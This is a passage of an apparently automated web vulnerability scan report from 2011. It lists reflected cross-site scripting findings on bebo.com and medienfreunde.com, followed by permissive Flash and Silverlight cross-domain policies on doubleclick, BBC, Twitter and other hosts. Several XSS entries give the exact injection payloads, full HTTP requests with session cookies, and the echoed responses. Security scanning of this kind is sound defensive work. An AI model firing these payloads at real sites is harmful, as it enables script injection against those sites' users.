2.96. http://s.bebo.com/c/site/index20_script.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://s.bebo.com
Path:	/c/site/index20_script.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cac75'%3be425e5815a9 was submitted in the REST URL parameter 3. This input was echoed as cac75';e425e5815a9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /c/site/index20_script.jscac75'%3be425e5815a9?fp=1ac0db15f4e80064d8323ae07c9b030a HTTP/1.1
Host: s.bebo.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bdaysession=3ed3f970babdc8d864296861; sessioncreate=20110706112129; bvid=83c54b44-e0db-47d2-b16c-752d38b1e9b7|1309951289065

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Date: Wed, 06 Jul 2011 11:22:17 GMT
Content-Length: 14122
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Pragma: No-cache
X-N: S

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
UT' && elem.type=='button'))) {if (elem.className && elem.id && elem.className.indexOf('gatrack')!=-1 ) {var elemIdent = elem.id.replace(/[^a-z0-9-]/g,'_');var trackingPath = '/_/site/index20_script.jscac75';e425e5815a9/'+elemIdent;this._trackPageview(trackingPath);}}} catch(ignore){}}; var pageTracker1=_gat._getTracker('UA-246268-1');pageTracker1._setDomainName('.bebo.com');pageTracker1._setSampleRate('10');pageTrac
...[SNIP]...

2.97. http://s.bebo.com/c/site/index20_script.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s.bebo.com
Path:	/c/site/index20_script.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 694e4"><img%20src%3da%20onerror%3dalert(1)>c97eeae1d10 was submitted in the REST URL parameter 3. This input was echoed as 694e4"><img src=a onerror=alert(1)>c97eeae1d10 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /c/site/694e4"><img%20src%3da%20onerror%3dalert(1)>c97eeae1d10?fp=1ac0db15f4e80064d8323ae07c9b030a HTTP/1.1
Host: s.bebo.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bdaysession=3ed3f970babdc8d864296861; sessioncreate=20110706112129; bvid=83c54b44-e0db-47d2-b16c-752d38b1e9b7|1309951289065

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Date: Wed, 06 Jul 2011 11:22:16 GMT
Content-Length: 14278
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Pragma: No-cache
X-N: S

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<body class="bebo_lang_us bebo_country_us layout_bebo800" id="c-site-694e4"><img src=a onerror=alert(1)>c97eeae1d10" >
...[SNIP]...

2.98. http://s.bebo.com/c/site/index20_script.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s.bebo.com
Path:	/c/site/index20_script.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ee94a<img%20src%3da%20onerror%3dalert(1)>dae524548ab was submitted in the REST URL parameter 3. This input was echoed as ee94a<img src=a onerror=alert(1)>dae524548ab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /c/site/index20_script.jsee94a<img%20src%3da%20onerror%3dalert(1)>dae524548ab?fp=1ac0db15f4e80064d8323ae07c9b030a HTTP/1.1
Host: s.bebo.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bdaysession=3ed3f970babdc8d864296861; sessioncreate=20110706112129; bvid=83c54b44-e0db-47d2-b16c-752d38b1e9b7|1309951289065

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Date: Wed, 06 Jul 2011 11:22:20 GMT
Content-Length: 14366
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Pragma: No-cache
X-N: S

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<div id="content" class="content-wrap">Could not find action: index20_script.jsee94a<img src=a onerror=alert(1)>dae524548ab.</div>
...[SNIP]...

2.99. http://s.bebo.com/c/site/index20_script.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s.bebo.com
Path:	/c/site/index20_script.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 810dd'><script>alert(1)</script>9bdaf6f52b2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c/site/index20_script.js810dd'><script>alert(1)</script>9bdaf6f52b2?fp=1ac0db15f4e80064d8323ae07c9b030a HTTP/1.1
Host: s.bebo.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bdaysession=3ed3f970babdc8d864296861; sessioncreate=20110706112129; bvid=83c54b44-e0db-47d2-b16c-752d38b1e9b7|1309951289065

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Date: Wed, 06 Jul 2011 11:22:17 GMT
Content-Length: 14291
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Pragma: No-cache
X-N: S

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<a href='/SwitchLanguage.jsp?Page=c/site/index20_script_js810dd'><script>alert(1)</script>9bdaf6f52b2&QueryString=fp%3D1ac0db15f4e80064d8323ae07c9b030a&Lang=fr'>
...[SNIP]...

2.100. http://medienfreunde.com/lab/innerfade/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://medienfreunde.com
Path:	/lab/innerfade/

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc0bc"><script>alert(1)</script>80bc0e527c9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /lab/innerfade/ HTTP/1.1
Host: medienfreunde.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: dc0bc"><script>alert(1)</script>80bc0e527c9

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.12-nmm2
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 14719

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">

<hea
...[SNIP]...
<iframe src="http://pingomatic.com/ping/?title=Leipzig&blogurl=dc0bc"><script>alert(1)</script>80bc0e527c9&rssurl=&chk_weblogscom=on&chk_blogs=on&chk_technorati=on&chk_feedburner=on&chk_syndic8=on&chk_newsgator=on&chk_feedster=on&chk_myyahoo=on&chk_pubsubcom=on&chk_blogdigger=on&chk_blogstreet=on&chk_moreo
...[SNIP]...

3. Flash cross-domain policy previous next
There are 13 instances of this issue:

http://ad.doubleclick.net/crossdomain.xml
http://adx.adnxs.com/crossdomain.xml
http://bp.specificclick.net/crossdomain.xml
http://core.insightexpressai.com/crossdomain.xml
http://ecn.dev.virtualearth.net/crossdomain.xml
http://idcs.interclick.com/crossdomain.xml
http://rs.gwallet.com/crossdomain.xml
http://bstats.adbrite.com/crossdomain.xml
http://cdn.stumble-upon.com/crossdomain.xml
http://feeds.bbci.co.uk/crossdomain.xml
http://googleads.g.doubleclick.net/crossdomain.xml
http://newsrss.bbc.co.uk/crossdomain.xml
http://api.twitter.com/crossdomain.xml

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

3.1. http://ad.doubleclick.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 21:42:14 GMT
Date: Wed, 06 Jul 2011 11:55:06 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

3.2. http://adx.adnxs.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adx.adnxs.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: adx.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 07-Jul-2011 15:39:09 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Tue, 04-Oct-2011 15:39:09 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

3.3. http://bp.specificclick.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bp.specificclick.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: bp.specificclick.net

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Content-Type: text/xml
Content-Length: 194
Date: Wed, 06 Jul 2011 15:39:03 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>

3.4. http://core.insightexpressai.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://core.insightexpressai.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: core.insightexpressai.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Tue, 02 Feb 2010 21:21:42 GMT
ETag: "0f7cfb64da4ca1:0"
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Date: Wed, 06 Jul 2011 15:38:53 GMT
Content-Length: 139
Connection: close
Cache-Control: no-store

<cross-domain-policy>
<allow-access-from domain="*" />
<site-control permitted-cross-domain-policies="all"/>
</cross-domain-policy>

3.5. http://ecn.dev.virtualearth.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ecn.dev.virtualearth.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ecn.dev.virtualearth.net

Response

HTTP/1.0 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Last-Modified: Thu, 16 Jun 2011 00:30:01 GMT
Accept-Ranges: bytes
ETag: "57c5b87bc2bcc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 06 Jul 2011 15:38:54 GMT
Content-Length: 277
Connection: close

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-r
...[SNIP]...

3.6. http://idcs.interclick.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idcs.interclick.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: idcs.interclick.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 23 Jun 2011 03:34:28 GMT
Accept-Ranges: bytes
ETag: "f5f224755631cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Wed, 06 Jul 2011 15:39:03 GMT
Connection: close
Content-Length: 225

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

3.7. http://rs.gwallet.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://rs.gwallet.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: rs.gwallet.com

Response

HTTP/1.1 200 OK
Content-Length: 207
Server: radiumone/1.2
Content-type: text/xml; charset=UTF-8
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-domain-
...[SNIP]...

3.8. http://bstats.adbrite.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://bstats.adbrite.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: bstats.adbrite.com

Response

HTTP/1.1 200 OK
Content-Type: text/x-cross-domain-policy
Content-Length: 398
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Wed, 06 Jul 2011 15:39:06 GMT

<?xml version="1.0" encoding="UTF-8"?>

<cross-domain-policy>
<allow-access-from domain="*.adbrite.com" secure="true" />
<allow-access-from domain="www.adbrite.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.britepic.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.britepic.com" secure="true" />
...[SNIP]...

3.9. http://cdn.stumble-upon.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://cdn.stumble-upon.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.stumble-upon.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 31 May 2011 21:14:03 GMT
Content-Type: application/xml
Content-Length: 460
Date: Wed, 06 Jul 2011 11:15:25 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <allow-access-from domain="www.stumbleupon.com" />
   <allow-access-from domain="*.stumble.net" />
   <allow-access-from domain="stumble.net" />
   <allow-access-from domain="*.stumbleupon.com" />
   <allow-access-from domain="stumbleupon.com" />
...[SNIP]...

3.10. http://feeds.bbci.co.uk/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://feeds.bbci.co.uk
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=120
Expires: Wed, 06 Jul 2011 11:56:38 GMT
Date: Wed, 06 Jul 2011 11:54:38 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
   <allow-access-from domain="newsrss.bbc.co.uk" />
   <allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

3.11. http://googleads.g.doubleclick.net/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Fri, 27 May 2011 17:28:41 GMT
Date: Wed, 06 Jul 2011 01:47:26 GMT
Expires: Thu, 07 Jul 2011 01:47:26 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 36459
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

3.12. http://newsrss.bbc.co.uk/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://newsrss.bbc.co.uk
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=120
Expires: Wed, 06 Jul 2011 11:56:37 GMT
Date: Wed, 06 Jul 2011 11:54:37 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
...[SNIP]...
<allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

3.13. http://api.twitter.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.twitter.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.twitter.com

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:02:30 GMT
Server: hi
Status: 200 OK
Last-Modified: Tue, 05 Jul 2011 19:19:41 GMT
Content-Type: application/xml
Content-Length: 561
Cache-Control: max-age=1800
Expires: Wed, 06 Jul 2011 14:32:30 GMT
Vary: Accept-Encoding
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="twitter.com" />
...[SNIP]...
<allow-access-from domain="search.twitter.com" />
<allow-access-from domain="static.twitter.com" />
...[SNIP]...

4. Silverlight cross-domain policy previous next
There are 3 instances of this issue:

http://ad.doubleclick.net/clientaccesspolicy.xml
http://ecn.dev.virtualearth.net/clientaccesspolicy.xml
http://profile.live.com/clientaccesspolicy.xml

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

4.1. http://ad.doubleclick.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Tue, 20 May 2008 22:28:37 GMT
Date: Wed, 06 Jul 2011 11:55:06 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

4.2. http://ecn.dev.virtualearth.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ecn.dev.virtualearth.net
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ecn.dev.virtualearth.net

Response

HTTP/1.0 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Last-Modified: Thu, 16 Jun 2011 00:30:01 GMT
Accept-Ranges: bytes
ETag: "57c5b87bc2bcc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 06 Jul 2011 15:38:55 GMT
Content-Length: 374
Connection: close

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
<domain uri="http://*"/>
...[SNIP]...

4.3. http://profile.live.com/clientaccesspolicy.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://profile.live.com
Path:	/clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

